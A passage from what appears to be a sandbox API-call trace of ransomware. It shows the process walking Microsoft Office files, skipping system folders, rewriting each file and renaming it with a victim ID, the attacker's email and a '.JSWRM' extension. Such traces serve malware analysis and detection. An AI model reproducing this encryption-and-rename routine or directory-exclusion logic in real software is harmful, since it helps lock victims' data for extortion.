lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x84a0, lpOverlapped=0x0) returned 1 [0113.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.299] CloseHandle (hObject=0x238) returned 1 [0113.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0113.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0113.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0113.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0113.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0113.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0113.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.300] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSM.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osm.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSM.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osm.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.301] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116e5533, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116e5533, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x116e5533, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf38, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="OSMUX.x-none.msi.16_mondoww.mcxml", cAlternateFileName="OSMUXX~1.MCX")) returned 1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.301] lstrcmpiW (lpString1="OSMUX.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0113.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSMUX.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSMUX.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSMUX.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0113.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSMUX.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSMUX.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSMUX.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0113.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0113.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0113.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0113.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSMUX.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osmux.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.302] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=53048) returned 1 [0113.302] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcf30) returned 0x24c1d0 [0113.303] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xcf30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xcf30, lpOverlapped=0x0) returned 1 [0113.308] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.308] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xcf30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xcf30, lpOverlapped=0x0) returned 1 [0113.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.309] CloseHandle (hObject=0x238) returned 1 [0113.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0113.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0113.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0113.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0113.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0113.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0113.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.310] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSMUX.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osmux.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\OSMUX.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\osmux.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.311] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116e5533, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116e5533, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1181684e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20337a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Outlook.x-none.msi.16_mondoww.mcxml", cAlternateFileName="OUTLOO~1.MCX")) returned 1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.311] lstrcmpiW (lpString1="Outlook.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0113.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Outlook.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0113.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0113.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x22ce70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Outlook.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0113.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0113.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0113.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0113.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.312] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2110330) returned 1 [0113.312] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.313] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.345] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.345] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.345] CloseHandle (hObject=0x238) returned 1 [0113.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0113.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0113.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0113.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0113.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0113.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0113.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0113.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0113.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0113.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.347] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x117f066f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x117f066f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x117f066f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", cAlternateFileName="OUTLOO~2.MCX")) returned 1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2=".") returned 1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="..") returned 1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="...") returned 1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="windows") returned -1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="recovery") returned -1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="perflogs") returned -1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="documents and settings") returned 1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="system volume information") returned -1 [0113.347] lstrcmpiW (lpString1="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpString2="msocache") returned 1 [0113.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0113.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0113.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0113.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpUsedDefaultChar=0x0) returned 53 [0113.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0113.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0113.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0113.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0113.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", cchWideChar=53, lpMultiByteStr=0x20d698, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml", lpUsedDefaultChar=0x0) returned 53 [0113.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0113.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0113.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0113.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0113.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 